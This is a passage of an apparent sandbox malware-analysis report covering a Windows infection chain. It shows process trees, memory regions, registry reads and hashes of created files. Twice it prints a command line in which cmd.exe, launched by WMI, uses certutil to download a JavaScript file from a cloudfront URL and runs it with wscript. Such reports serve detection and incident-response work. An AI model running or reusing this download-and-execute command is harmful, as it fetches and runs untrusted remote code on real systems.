powrprof.dll 0x7ffb39d90000 0x7ffb39dd9fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7ffb3a800000 0x7ffb3a9dcfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x7ffb3a9e0000 0x7ffb3a9e7fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7ffb3bf80000 0x7ffb3c0a5fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7ffb3c2d0000 0x7ffb3c375fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7ffb3c3e0000 0x7ffb3c564fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x7ffb3c570000 0x7ffb3c5d8fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x7ffb3c650000 0x7ffb3c79dfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7ffb3c950000 0x7ffb3c9aafff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7ffb3c9b0000 0x7ffb3ca6dfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x7ffb3ca70000 0x7ffb3cb14fff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x7ffb3cc70000 0x7ffb3ceebfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffb3cf10000 0x7ffb3cfacfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffb3d260000 0x7ffb3d30cfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffb3d310000 0x7ffb3d4d1fff Memory Mapped File Readable, Writable, Executable False False False -
Process #4: cmd.exe
66 0
»
Information Value
ID #4
File Name c:\windows\system32\cmd.exe
Command Line cmd.exe /c certutil.exe -urlcache -split -f https://dl6zxn23r8r14.cloudfront.net:443/en-US C:\Users\Public\en-US.js && wscript.exe C:\Users\Public\en-US.js
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:40, Reason: Child Process
Unmonitor End Time: 00:10:33, Reason: Terminated by Timeout
Monitor Duration 00:09:53
OS Process Information
»
Information Value
PID 0xc40
Parent PID 0xae8 (c:\windows\system32\wbem\wmiprvse.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x C44
0x BEC
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x0000004e96db0000 0x4e96db0000 0x4e96dcffff Private Memory Readable, Writable True True False
pagefile_0x0000004e96db0000 0x4e96db0000 0x4e96dbffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000004e96dc0000 0x4e96dc0000 0x4e96dc6fff Private Memory Readable, Writable True True False
pagefile_0x0000004e96dd0000 0x4e96dd0000 0x4e96de3fff Pagefile Backed Memory Readable True False False -
private_0x0000004e96df0000 0x4e96df0000 0x4e96eeffff Private Memory Readable, Writable True True False
pagefile_0x0000004e96ef0000 0x4e96ef0000 0x4e96ef3fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000004e96f00000 0x4e96f00000 0x4e96f00fff Pagefile Backed Memory Readable True False False -
private_0x0000004e96f10000 0x4e96f10000 0x4e96f11fff Private Memory Readable, Writable True True False
locale.nls 0x4e96f20000 0x4e96fddfff Memory Mapped File Readable False False False -
private_0x0000004e96fe0000 0x4e96fe0000 0x4e970dffff Private Memory Readable, Writable True True False
private_0x0000004e970e0000 0x4e970e0000 0x4e970e6fff Private Memory Readable, Writable True True False
private_0x0000004e970f0000 0x4e970f0000 0x4e971effff Private Memory Readable, Writable True True False
private_0x0000004e973b0000 0x4e973b0000 0x4e973bffff Private Memory Readable, Writable True True False
sortdefault.nls 0x4e973c0000 0x4e976f6fff Memory Mapped File Readable False False False -
pagefile_0x00007df5ff750000 0x7df5ff750000 0x7ff5ff74ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff78fa70000 0x7ff78fa70000 0x7ff78fb6ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff78fb70000 0x7ff78fb70000 0x7ff78fb92fff Pagefile Backed Memory Readable True False False -
private_0x00007ff78fb9b000 0x7ff78fb9b000 0x7ff78fb9cfff Private Memory Readable, Writable True True False
private_0x00007ff78fb9d000 0x7ff78fb9d000 0x7ff78fb9efff Private Memory Readable, Writable True True False
private_0x00007ff78fb9f000 0x7ff78fb9f000 0x7ff78fb9ffff Private Memory Readable, Writable True True False
cmd.exe 0x7ff7906e0000 0x7ff790738fff Memory Mapped File Readable, Writable, Executable True False False -
kernelbase.dll 0x7ffb3a800000 0x7ffb3a9dcfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffb3cf10000 0x7ffb3cfacfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffb3d260000 0x7ffb3d30cfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffb3d310000 0x7ffb3d4d1fff Memory Mapped File Readable, Writable, Executable False False False -
Threads
Thread 0xc44
66 0
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\system32\cmd.exe, base_address = 0x7ff7906e0000 True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffb3d260000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x7ffb3d27d550 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 3
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Environment Get Environment String - True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module Get Filename process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Get Environment String name = PROMPT False 1
Fn
Environment Set Environment String name = PROMPT, value = $P$G True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Environment Get Environment String name = KEYS False 1
Fn
File Get Info filename = C:\Windows\system32, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\System32, type = file_attributes True 1
Fn
Environment Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffb3d260000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x7ffb3d2825e0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x7ffb3d281f90 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x7ffb3a853a10 True 1
Fn
File Get Info filename = certutil.exe, type = file_attributes True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Process Create process_name = C:\Windows\system32\certutil.exe, os_pid = 0xcf4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Environment Set Environment String name = COPYCMD True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCodeAscii True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Get Info filename = wscript.exe, type = file_attributes True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Process Create process_name = C:\Windows\system32\wscript.exe, os_pid = 0x33c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Environment Set Environment String name = COPYCMD True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCodeAscii True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
Process #6: certutil.exe
49 79
»
Information Value
ID #6
File Name c:\windows\system32\certutil.exe
Command Line certutil.exe -urlcache -split -f https://dl6zxn23r8r14.cloudfront.net:443/en-US C:\Users\Public\en-US.js
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:41, Reason: Child Process
Unmonitor End Time: 00:10:33, Reason: Terminated by Timeout
Monitor Duration 00:09:52
OS Process Information
»
Information Value
PID 0xcf4
Parent PID 0xc40 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x CE8
0x CF0
0x 2DC
0x 1F4
0x 9D4
0x CFC
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x0000004d31600000 0x4d31600000 0x4d3161ffff Private Memory Readable, Writable True True False
pagefile_0x0000004d31600000 0x4d31600000 0x4d3160ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000004d31610000 0x4d31610000 0x4d31616fff Private Memory Readable, Writable True True False
pagefile_0x0000004d31620000 0x4d31620000 0x4d31633fff Pagefile Backed Memory Readable True False False -
private_0x0000004d31640000 0x4d31640000 0x4d316bffff Private Memory Readable, Writable True True False
pagefile_0x0000004d316c0000 0x4d316c0000 0x4d316c3fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000004d316d0000 0x4d316d0000 0x4d316d0fff Pagefile Backed Memory Readable True False False -
private_0x0000004d316e0000 0x4d316e0000 0x4d316e1fff Private Memory Readable, Writable True True False
locale.nls 0x4d316f0000 0x4d317adfff Memory Mapped File Readable False False False -
private_0x0000004d317b0000 0x4d317b0000 0x4d3182ffff Private Memory Readable, Writable True True False
pagefile_0x0000004d31830000 0x4d31830000 0x4d31831fff Pagefile Backed Memory Readable True False False -
private_0x0000004d31840000 0x4d31840000 0x4d31846fff Private Memory Readable, Writable True True False
certutil.exe.mui 0x4d31850000 0x4d31875fff Memory Mapped File Readable False False False -
private_0x0000004d31880000 0x4d31880000 0x4d31880fff Private Memory Readable, Writable True True False
private_0x0000004d31890000 0x4d31890000 0x4d31890fff Private Memory Readable, Writable True True False
private_0x0000004d318a0000 0x4d318a0000 0x4d318a0fff Private Memory Readable, Writable True True False
private_0x0000004d318b0000 0x4d318b0000 0x4d318cffff Private Memory Readable, Writable True True False
pagefile_0x0000004d318b0000 0x4d318b0000 0x4d318b0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000004d318b0000 0x4d318b0000 0x4d318b3fff Pagefile Backed Memory Readable True False False -
private_0x0000004d318c0000 0x4d318c0000 0x4d318cffff Private Memory Readable, Writable True True False
private_0x0000004d318d0000 0x4d318d0000 0x4d319cffff Private Memory Readable, Writable True True False
crypt32.dll.mui 0x4d319d0000 0x4d319d9fff Memory Mapped File Readable False False False -
winnlsres.dll 0x4d319e0000 0x4d319e4fff Memory Mapped File Readable False False False -
winnlsres.dll.mui 0x4d319f0000 0x4d319fffff Memory Mapped File Readable False False False -
private_0x0000004d31a00000 0x4d31a00000 0x4d31a0ffff Private Memory Readable, Writable True True False
pagefile_0x0000004d31a10000 0x4d31a10000 0x4d31ac7fff Pagefile Backed Memory Readable True False False -
private_0x0000004d31ad0000 0x4d31ad0000 0x4d31ad0fff Private Memory Readable, Writable True True False
mswsock.dll.mui 0x4d31ad0000 0x4d31ad2fff Memory Mapped File Readable False False False -
pagefile_0x0000004d31ae0000 0x4d31ae0000 0x4d31ae1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000004d31af0000 0x4d31af0000 0x4d31af0fff Pagefile Backed Memory Readable, Writable True False False -
counters.dat 0x4d31b00000 0x4d31b00fff Memory Mapped File Readable, Writable True True False
pagefile_0x0000004d31b10000 0x4d31b10000 0x4d31b10fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000004d31b20000 0x4d31b20000 0x4d31b21fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000004d31b30000 0x4d31b30000 0x4d31b3ffff Pagefile Backed Memory Readable True False False -
private_0x0000004d31b40000 0x4d31b40000 0x4d31b4ffff Private Memory Readable, Writable True True False
sortdefault.nls 0x4d31b50000 0x4d31e86fff Memory Mapped File Readable False False False -
pagefile_0x0000004d31e90000 0x4d31e90000 0x4d32017fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000004d32020000 0x4d32020000 0x4d321a0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000004d321b0000 0x4d321b0000 0x4d335affff Pagefile Backed Memory Readable True False False -
private_0x0000004d335b0000 0x4d335b0000 0x4d3362ffff Private Memory Readable, Writable True True False
private_0x0000004d33630000 0x4d33630000 0x4d336affff Private Memory Readable, Writable True True False
private_0x0000004d336b0000 0x4d336b0000 0x4d3372ffff Private Memory Readable, Writable True True False
private_0x0000004d33730000 0x4d33730000 0x4d337affff Private Memory Readable, Writable True True False
private_0x0000004d337b0000 0x4d337b0000 0x4d338affff Private Memory Readable, Writable True True False
pagefile_0x0000004d338b0000 0x4d338b0000 0x4d338b1fff Pagefile Backed Memory Readable True False False -
private_0x0000004d338c0000 0x4d338c0000 0x4d33abffff Private Memory Readable, Writable True True False
private_0x0000004d33ac0000 0x4d33ac0000 0x4d33ebffff Private Memory Readable, Writable True True False
pagefile_0x00007df5ff790000 0x7df5ff790000 0x7ff5ff78ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff6bab50000 0x7ff6bab50000 0x7ff6bac4ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff6bac50000 0x7ff6bac50000 0x7ff6bac72fff Pagefile Backed Memory Readable True False False -
private_0x00007ff6bac73000 0x7ff6bac73000 0x7ff6bac74fff Private Memory Readable, Writable True True False
private_0x00007ff6bac75000 0x7ff6bac75000 0x7ff6bac76fff Private Memory Readable, Writable True True False
private_0x00007ff6bac77000 0x7ff6bac77000 0x7ff6bac77fff Private Memory Readable, Writable True True False
private_0x00007ff6bac78000 0x7ff6bac78000 0x7ff6bac79fff Private Memory Readable, Writable True True False
private_0x00007ff6bac7a000 0x7ff6bac7a000 0x7ff6bac7bfff Private Memory Readable, Writable True True False
private_0x00007ff6bac7c000 0x7ff6bac7c000 0x7ff6bac7dfff Private Memory Readable, Writable True True False
private_0x00007ff6bac7e000 0x7ff6bac7e000 0x7ff6bac7ffff Private Memory Readable, Writable True True False
certutil.exe 0x7ff6baf50000 0x7ff6bb0a7fff Memory Mapped File Readable, Writable, Executable True False False -
certcli.dll 0x7ffb21cd0000 0x7ffb21d43fff Memory Mapped File Readable, Writable, Executable False False False -
cryptui.dll 0x7ffb21d50000 0x7ffb21de8fff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x7ffb21df0000 0x7ffb21e99fff Memory Mapped File Readable, Writable, Executable False False False -
certca.dll 0x7ffb23a70000 0x7ffb23b2efff Memory Mapped File Readable, Writable, Executable False False False -
mskeyprotect.dll 0x7ffb25e30000 0x7ffb25e43fff Memory Mapped File Readable, Writable, Executable False False False -
ncryptsslp.dll 0x7ffb25ee0000 0x7ffb25efefff Memory Mapped File Readable, Writable, Executable False False False -
ntdsapi.dll 0x7ffb25f00000 0x7ffb25f27fff Memory Mapped File Readable, Writable, Executable False False False -
webio.dll 0x7ffb2ae50000 0x7ffb2aecffff Memory Mapped File Readable, Writable, Executable False False False -
cryptnet.dll 0x7ffb2dd00000 0x7ffb2dd2efff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x7ffb2e5a0000 0x7ffb2e846fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x7ffb2ea50000 0x7ffb2ebe6fff Memory Mapped File Readable, Writable, Executable False False False -
ondemandconnroutehelper.dll 0x7ffb2ec80000 0x7ffb2ec94fff Memory Mapped File Readable, Writable, Executable False False False -
netapi32.dll 0x7ffb30240000 0x7ffb30256fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x7ffb308c0000 0x7ffb308c9fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x7ffb318d0000 0x7ffb318d9fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x7ffb31aa0000 0x7ffb31e15fff Memory Mapped File Readable, Writable, Executable False False False -
winhttp.dll 0x7ffb333f0000 0x7ffb334c5fff Memory Mapped File Readable, Writable, Executable False False False -
secur32.dll 0x7ffb334d0000 0x7ffb334dbfff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x7ffb34cc0000 0x7ffb34f33fff Memory Mapped File Readable, Writable, Executable False False False -
cabinet.dll 0x7ffb34f40000 0x7ffb34f66fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x7ffb361e0000 0x7ffb36247fff Memory Mapped File Readable, Writable, Executable False False False -
dhcpcsvc.dll 0x7ffb362a0000 0x7ffb362b9fff Memory Mapped File Readable, Writable, Executable False False False -
dhcpcsvc6.dll 0x7ffb362c0000 0x7ffb362d5fff Memory Mapped File Readable, Writable, Executable False False False -
samcli.dll 0x7ffb366c0000 0x7ffb366d7fff Memory Mapped File Readable, Writable, Executable False False False -
wkscli.dll 0x7ffb36c00000 0x7ffb36c15fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x7ffb373f0000 0x7ffb373fafff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x7ffb37410000 0x7ffb37447fff Memory Mapped File Readable, Writable, Executable False False False -
dsrole.dll 0x7ffb37460000 0x7ffb37469fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x7ffb37f40000 0x7ffb37f61fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x7ffb38610000 0x7ffb386a5fff Memory Mapped File Readable, Writable, Executable False False False -
gpapi.dll 0x7ffb38c60000 0x7ffb38c82fff Memory Mapped File Readable, Writable, Executable False False False -
netutils.dll 0x7ffb38f90000 0x7ffb38f9bfff Memory Mapped File Readable, Writable, Executable False False False -
srvcli.dll 0x7ffb38fa0000 0x7ffb38fc5fff Memory Mapped File Readable, Writable, Executable False False False -
schannel.dll 0x7ffb390e0000 0x7ffb39153fff Memory Mapped File Readable, Writable, Executable False False False -
dpapi.dll 0x7ffb39160000 0x7ffb39169fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x7ffb39260000 0x7ffb39292fff Memory Mapped File Readable, Writable, Executable False False False -
logoncli.dll 0x7ffb39370000 0x7ffb393adfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x7ffb393b0000 0x7ffb39457fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x7ffb395b0000 0x7ffb3960cfff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x7ffb39610000 0x7ffb39626fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x7ffb39780000 0x7ffb3978afff Memory Mapped File Readable, Writable, Executable False False False -
ntasn1.dll 0x7ffb39810000 0x7ffb39845fff Memory Mapped File Readable, Writable, Executable False False False -
ncrypt.dll 0x7ffb39850000 0x7ffb39875fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x7ffb39960000 0x7ffb3998bfff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x7ffb39b60000 0x7ffb39b87fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x7ffb39b90000 0x7ffb39bfafff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x7ffb39d40000 0x7ffb39d50fff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x7ffb39d60000 0x7ffb39d6efff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x7ffb39d70000 0x7ffb39d82fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x7ffb39d90000 0x7ffb39dd9fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x7ffb39de0000 0x7ffb3a407fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x7ffb3a410000 0x7ffb3a453fff Memory Mapped File Readable, Writable, Executable False False False -
wintrust.dll 0x7ffb3a460000 0x7ffb3a4b3fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x7ffb3a570000 0x7ffb3a622fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x7ffb3a630000 0x7ffb3a7f0fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7ffb3a800000 0x7ffb3a9dcfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x7ffb3a9e0000 0x7ffb3a9e7fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7ffb3a9f0000 0x7ffb3aa40fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x7ffb3aa50000 0x7ffb3bf74fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7ffb3bf80000 0x7ffb3c0a5fff Memory Mapped File Readable, Writable, Executable False False False -
normaliz.dll 0x7ffb3c0b0000 0x7ffb3c0b6fff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x7ffb3c0c0000 0x7ffb3c284fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7ffb3c290000 0x7ffb3c2c5fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7ffb3c2d0000 0x7ffb3c375fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7ffb3c3e0000 0x7ffb3c564fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x7ffb3c570000 0x7ffb3c5d8fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x7ffb3c650000 0x7ffb3c79dfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7ffb3c950000 0x7ffb3c9aafff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7ffb3c9b0000 0x7ffb3ca6dfff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7ffb3cb20000 0x7ffb3cc60fff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x7ffb3cc70000 0x7ffb3ceebfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffb3cf10000 0x7ffb3cfacfff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x7ffb3cfc0000 0x7ffb3d01afff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x7ffb3d020000 0x7ffb3d17bfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffb3d260000 0x7ffb3d30cfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffb3d310000 0x7ffb3d4d1fff Memory Mapped File Readable, Writable, Executable False False False -
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\windows\cercf51.tmp 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\ciihmnxmn6ps\appdata\locallow\microsoft\cryptneturlcache\content\0cf27c2989dc9db1c5967c252cccaa32 284.12 KB MD5: a7d292275cc4b1be0a7408fcc4641a54
SHA1: 06136ba4a292a54206c9cdc80d262ebe0859aaab
SHA256: 2dc1e524f8129ec1a18c62b75b5a00f7f3a9f383f7c9e0299c4a5f50453d51ff
False
c:\users\public\en-us.js 284.12 KB MD5: a7d292275cc4b1be0a7408fcc4641a54
SHA1: 06136ba4a292a54206c9cdc80d262ebe0859aaab
SHA256: 2dc1e524f8129ec1a18c62b75b5a00f7f3a9f383f7c9e0299c4a5f50453d51ff
False
c:\users\ciihmnxmn6ps\appdata\locallow\microsoft\cryptneturlcache\metadata\0cf27c2989dc9db1c5967c252cccaa32 0.21 KB MD5: cf7bc666d33cdf89e0292a80599dbc6f
SHA1: 57beed93acdab18424c471f4438e147847b80534
SHA256: a49ddfae6b539c2b9705aa3dc1e61694e768bfb077c789c2295e03f0f02efc6b
False
Threads
Thread 0xce8
49 37
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\system32\certutil.exe, base_address = 0x7ff6baf50000 True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffb3d260000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = WerSetFlags, address_out = 0x7ffb3d266390 True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffb3d260000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x7ffb3d27d550 True 1
Fn
File Create Temp File filename = C:\Windows\cerCF51.tmp, path = C:\Windows, prefix = cert True 1
Fn
File Delete filename = C:\Windows\cerCF51.tmp True 1
Fn
System Get Time type = System Time, time = 2018-02-15 18:29:26 (UTC) True 2
Fn
System Get Time type = Local Time, time = 2018-02-16 05:29:26 (Local Time) True 1
Fn
Module Get Handle module_name = c:\windows\system32\certca.dll, base_address = 0x7ffb23a70000 True 1
Fn
Module Get Handle module_name = c:\windows\system32\certcli.dll, base_address = 0x7ffb21cd0000 True 1
Fn
Window Create window_name = CertUtil Application, class_name = CertUtil, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\AutoEnrollment False 1
Fn
System Get Computer Name result_out = LHNIWSJ True 1
Fn
System Get Computer Name type = ComputerNameDnsFullyQualified False 1
Fn
System Get Computer Name result_out = LHnIwsj, type = ComputerNameDnsFullyQualified True 1
